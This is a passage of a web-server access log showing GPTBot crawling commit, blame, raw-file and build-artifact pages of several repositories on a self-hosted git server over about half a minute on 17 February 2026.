74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:15:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs" -[17/Feb/2026:15:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:15:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 21146] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:15:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=Python&q=&sort=recentupdate&tab=repositories" [Client 74.7.227.38] [Length 7796] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:15:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" -[17/Feb/2026:15:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 11137] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:15:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10966] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:15:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2findex.html" [Client 74.7.227.38] [Length 27816] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:15:28:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/About.tsx" -[17/Feb/2026:15:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/About.tsx" -[17/Feb/2026:15:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=leastissues&state=open" [Client 74.7.227.38] [Length 8498] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" -[17/Feb/2026:15:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fbase_library.zip" [Client 74.7.227.38] [Length 17039] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:15:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fbase_library.zip" [Client 74.7.227.38] [Length 18032] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:15:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:15:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:15:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 15743] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" -[17/Feb/2026:15:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 9931] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:15:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 9933] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:15:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 10042] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:15:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:15:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:15:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 24373] [Gzip 15.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:15:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" -[17/Feb/2026:15:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12318] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:15:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8496] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" -[17/Feb/2026:15:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8490] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" -[17/Feb/2026:15:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=HTML&q=&sort=recentupdate&tab=repositories" [Client 74.7.227.38] [Length 7778] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:15:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" -[17/Feb/2026:15:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11551] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11054] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11075] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11526] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19881] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11077] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11521] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 